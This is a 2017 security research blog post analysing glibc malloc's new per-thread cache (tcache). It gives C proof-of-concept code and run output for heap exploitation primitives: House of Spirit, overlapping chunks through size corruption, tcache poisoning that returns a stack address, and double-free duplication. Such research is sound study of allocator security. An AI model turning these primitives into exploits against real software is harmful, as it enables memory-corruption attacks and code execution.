thread local caching in glibc malloc
08 Jul 2017

Welcome to the fifth episode of the ptmalloc fanzine, in which we look at thread local caching, a recent addition to glibc malloc.
TLDR
This episode consists of:
- an overview of the changes brought by per-thread caching
- an exploration of how tcaching affects some old techniques
- the House of Spirit: fewer and looser prerequisites
- creating overlapping chunks via size corruption of allocated chunks later passed into free
- tcache poisoning: forcing malloc to return completely arbitrary chunks in a similar fashion to fastbin poisoning, but with fewer prerequisites
- new possibilities
All analysis was done on this state of the glibc tree on Ubuntu 16.04 (x86-64).
Overview
The patch (see commit) offers significant performance gains (see benchmarks) by creating per-thread caches for chunks up to a certain size (practically below largebin sizes). Modifying these bins requires no locking, hence the speed improvements. It's important to note that no distros use it currently, since it will only be released as part of glibc 2.26 (scheduled for August), so things may change before it sees widespread use.
New structures
There are 2 new structures of interest, tcache_entry and tcache_perthread_struct. Both are rather simple, see them below. There are 64 singly-linked bins per thread by default, for chunksizes from 24 to 1032 (12 to 516 on x86) bytes, in 16 (8) byte increments. A single tcache bin contains at most 7 chunks by default.
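Reproduced approximately from the patched malloc.c (not a verbatim quote):

#define TCACHE_MAX_BINS 64

/* Overlaid on the user-data portion of a cached chunk, so the first
   qword of a cached chunk doubles as the next pointer of its
   tcache_entry. */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* One of these per thread; counts and entries are indexed by the
   tcache bin index derived from the chunksize. */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;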
tcache usage
Chunks can end up in the thread caches multiple ways:
- upon free: before the fastbin code in _int_free, if the chunk has an appropriate size and the corresponding bin isn’t full
- upon malloc, there are 3 places where caches are filled:
- if a fast chunk is returned, the other chunks from the corresponding fastbin are used to fill the appropriate tcache bin.
- the same is done if a small chunk is returned by malloc.
- in the binning code, exact size matches are first put in the tcache instead of returning immediately.
Chunks are taken from the tcache:
- in __libc_malloc, before _int_malloc (see the abridged excerpt after this list).
- after the binning code, if at least one exact match was found.
- there can also be a limit on the number of chunks that are put in the tcache in a run of the binning code. If that's reached, the last one found is returned. However, there is no limit by default.
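The check in __libc_malloc is the hot path; abridged, it looks approximately like this (not a verbatim quote). Note that nothing validates the chunk returned by tcache_get:

void *
__libc_malloc (size_t bytes)
{
  ...
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes = request2size (bytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  if (tc_idx < mp_.tcache_bins
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
#endif
  ...
  victim = _int_malloc (ar_ptr, bytes);
  ...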
Some observations:
- the tcache fill code in the fast path of malloc will reverse the order of the chunks.
- cached chunks won’t be coalesced (a short demo follows this list):
  - neither on free of neighboring chunks
  - nor with top when they are freed
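The lack of coalescing (and the LIFO behavior of the bins) can be demonstrated with a toy program like the sketch below, assuming a tcache-enabled glibc with default tunables; the sizes are arbitrary:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Two physically adjacent, tcache-sized chunks. */
    void *a = malloc(0x48);
    void *b = malloc(0x48);

    /* Both land in the 0x50 tcache bin; no consolidation happens,
       neither with each other nor with top. */
    free(a);
    free(b);

    /* A request for their combined size cannot be served from the
       cached chunks, so it comes from elsewhere (typically top). */
    void *c = malloc(0xa0);

    /* Requests for the cached size are served LIFO: b first, then a. */
    void *d = malloc(0x48);
    void *e = malloc(0x48);

    printf("a=%p b=%p c=%p d=%p e=%p\n", a, b, c, d, e);
    return 0;
}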
An offense-focused analysis
The tcache handling code is very early in both free and malloc, as it should be, meaning that most of the free/malloc code is bypassed for non-large chunksizes until the corresponding tcache bins are full. This is by design but has some ramifications. As a direct result, most integrity checks are bypassed. In _int_free, a corrupted chunk only has to pass the alignment and wrapping checks before being cached. On the malloc side, the caching happens in __libc_malloc.
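Abridged, the relevant part of _int_free looks approximately like this (error handling simplified; not a verbatim quote):

size = chunksize (p);

/* Wrapping and alignment checks: the only integrity checks a chunk
   has to pass on the tcache path. */
if ((uintptr_t) p > (uintptr_t) -size || misaligned_chunk (p))
  malloc_printerr (... "free(): invalid pointer" ...);
if (size < MINSIZE || !aligned_OK (size))
  malloc_printerr (... "free(): invalid size" ...);

#if USE_TCACHE
{
  size_t tc_idx = csize2tidx (size);

  /* If the corresponding bin isn't full, cache the chunk and return,
     skipping the rest of _int_free (and all of its checks). */
  if (tcache && tc_idx < mp_.tcache_bins
      && tcache->counts[tc_idx] < mp_.tcache_count)
    {
      tcache_put (p, tc_idx);
      return;
    }
}
#endif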
The House of Spirit
Consider what is needed to make the caching code at the beginning of _int_free accept a region as a chunk. A fake size value that satisfies the following is enough:
- it’s at a 2*SIZE_SZ aligned address
- its value is between MINSIZE and the maximum cached chunksize (1032/516 bytes)
- on x64, it also mustn’t have its 4th LSB set
This makes the House of Spirit much more powerful than it used to be: there are no nextsize checks and now it works for smallbin sizes, too. The tcache_house_of_spirit.c example shows this in practice by building a fake chunk with a smallbin size and an invalid nextchunk on the stack, passing it to free and getting it back from malloc.
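A minimal sketch of the same flow follows; this is not the repository example itself, and the array size, the 0x110 fake size and the initial dummy allocation (to make sure the heap and the tcache exist) are illustrative choices:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Backing memory for the fake chunk; the chunk must sit at a
       2*SIZE_SZ aligned address. */
    unsigned long fake[0x40] __attribute__((aligned(0x10)));

    /* Make sure the heap and the per-thread cache exist. */
    void *dummy = malloc(1);
    (void)dummy;

    /* Fill everything, including where the "next chunk" would be, with
       garbage: no nextsize/nextinuse checks run on the tcache path. */
    for (size_t i = 0; i < sizeof(fake) / sizeof(fake[0]); i++)
        fake[i] = 0x4141414141414141UL;

    fake[1] = 0x110;          /* fake size field: a smallbin-sized value */

    /* free() takes a pointer to user data, 2*SIZE_SZ past the header. */
    free(&fake[2]);

    /* The fake chunk went into the 0x110 tcache bin; ask for it back. */
    void *p = malloc(0x100);
    printf("fake chunk at %p, malloc(0x100) returned %p\n", (void *)fake, p);
    return 0;
}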
tukan@farm:~/work/libc/build/b2$ ./testrun.sh ../../../ptmalloc-fanzine/05-tcache/tcache_house_of_spirit
This example showcases how the House of Spirit became more powerful after the tcache patch
Filling space at and after the fake chunk with invalid data
Building fake chunk on the stack at 0x7fff781b50e0
Passed chunk to free, let's make an allocation for the fake size
malloc(0x100) returned: 0x7fff781b50f0
Overlapping chunks
Creating overlapping chunks via the binning code in _int_malloc by corrupting the size of a freed chunk has already been rather easy, but the caching mechanism brings this possibility to the allocated chunk/_int_free side, too. Any size that passes the checks discussed above will result in the chunk being placed into the tcache bin corresponding to the fake size. The overlapping_chunks_by_caching.c example shows this by enlarging a chunk.
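A minimal sketch along those lines (not the repository example; the sizes are illustrative):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    unsigned long *victim = malloc(0x48);   /* chunk size 0x50 */
    unsigned long *sentry = malloc(0x48);   /* sits right after the victim */

    /* Emulate the size corruption: the size field is the qword right
       before the returned pointer. */
    victim[-1] = 0x110;

    /* The corrupted size passes the alignment/wrapping checks, so the
       victim lands in the 0x110 tcache bin... */
    free(victim);

    /* ...and a request for that size returns it, overlapping sentry. */
    void *overlap = malloc(0x100);
    printf("victim=%p sentry=%p overlap=%p\n",
           (void *)victim, (void *)sentry, overlap);
    return 0;
}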
tukan@farm:~/work/libc/build/b2$ ./testrun.sh ../../../ptmalloc-fanzine/05-tcache/overlapping_chunks_by_caching
This example showcases the possibility to create overlapping chunks via the tcaching code in _int_free
Allocated victim chunk with requested size 0x48 at 0x560e374c4670
Allocated sentry element after victim (not strictly necessary): 0x560e374c46c0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x100 bytes, it is at: 0x560e374c4670
tcache poisoning
Bins in a tcache behave rather similarly to fastbins. Below is the code for tcache_get, responsible for removing a chunk from a tcache bin. Corrupting the next pointer in a tcache_entry yields the ability to return completely arbitrary chunks. Compared to the requirements for fastbin poisoning (a size_t value with the same fastbin_index as the poisoned fastbin to act as the size of the fake chunk), this is very attacker-friendly.
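The function, reproduced approximately from the patch (not a verbatim quote), is shown below; note that neither assert constrains the next pointer, and asserts aside there is no validation of the returned pointer at all:

static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}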
The tcache_poisoning.c example shows this in practice.
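A minimal sketch of the same idea follows (this is not the repository example; the stack target and the 0x48 request size are illustrative):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    unsigned long target[8];              /* stack region we want malloc to return */
    unsigned long *victim = malloc(0x48);

    /* Put the victim into the 0x50 tcache bin. */
    free(victim);

    /* Emulate the corruption: the first qword of a cached chunk is the
       next pointer of its tcache_entry. */
    victim[0] = (unsigned long)target;

    /* The first request returns the victim; the second follows the
       poisoned next pointer and returns the stack address. */
    void *a = malloc(0x48);
    void *b = malloc(0x48);
    printf("target=%p first=%p second=%p\n", (void *)target, a, b);
    return 0;
}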
tukan@farm:~/work/libc/build/b2$ ./testrun.sh ../../../ptmalloc-fanzine/05-tcache/tcache_poisoning
This example showcases tcache poisoning by forcing malloc to return an arbitrary chunk after the corruption of a tcache_entry
Our target is a stack region at 0x7fff0faa62c0
Allocated victim chunk with requested size 0x48 at 0x55f6a8fb9670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr of victim (while also corrupting its size for good measure)
Now we need to make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x48) returned 0x55f6a8fb9670, the second one: 0x7fff0faa62c0
Making a tcache bin circular by a double free is also a bit simpler than fastbin duplication because there is no double free check against the first member of the bin upon free.
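A minimal sketch of such a duplication, assuming a tcache-enabled glibc with default tunables:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    void *a = malloc(0x48);

    /* Unlike the fastbin path, there is no "is it already the head of
       the bin?" check here, so the bin becomes circular: a -> a -> ... */
    free(a);
    free(a);

    /* The same chunk is returned twice. */
    void *b = malloc(0x48);
    void *c = malloc(0x48);
    printf("a=%p b=%p c=%p\n", a, b, c);
    return 0;
}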
I consider these the more serious issues; what follows is a theoretical treatment of a couple of other primitives.
Smallbin cache filling bck write
The cache filling code of the smallbin path in _int_malloc mentioned previously traverses the smallbin corresponding to the requested size and places chunks into the corresponding tcache bin (until the smallbin is empty or the tcache bin is full). It does the same unlinking as the code a couple of lines above it to remove the victim chunk from the smallbin but lacks the bck->fd != victim check (see the abridged excerpt after this list). This means that
- the House of Lore could be made more practical again (though there are much more useful techniques now)
- an uncontrolled write similar to the unsorted bck write could be achieved
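Abridged, the fill loop in question looks approximately like this (not a verbatim quote; nb is the normalized request size and bin is the corresponding smallbin):

#if USE_TCACHE
  size_t tc_idx = csize2tidx (nb);
  if (tcache && tc_idx < mp_.tcache_bins)
    {
      mchunkptr tc_victim;

      /* While the smallbin is not empty and the tcache bin is not
         full, copy chunks over.  */
      while (tcache->counts[tc_idx] < mp_.tcache_count
             && (tc_victim = last (bin)) != bin)
        {
          if (tc_victim != 0)
            {
              bck = tc_victim->bk;
              ...
              /* Unlike the unlink above, no "bck->fd != tc_victim"
                 check: a corrupted bk yields a write of the bin
                 address into bck->fd. */
              bin->bk = bck;
              bck->fd = bin;

              tcache_put (tc_victim, tc_idx);
            }
        }
    }
#endif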
tcache_perthread_structs as corruption targets
The tcache_perthread_struct of a thread is allocated via _int_malloc, so it resides on the heap. The counts member is mostly uninteresting but corrupting the entries array would make it possible to do the previous tcache poisoning in fewer steps. Since allocation of the structure happens before any other allocation, the viability of this approach will highly depend on the target:
- the type of corruption
- once the number of threads reaches the arena number limit, arena sharing between threads might make these structures more interleaved with other data.
Conclusion
Per-thread caching is an interesting addition to glibc malloc providing significant performance benefits. However, it also seems to be a few steps backwards regarding the security posture of the allocator and shows that striking a good balance between performance and security is hard.
Special thanks to gym again for the rigorous proofreading.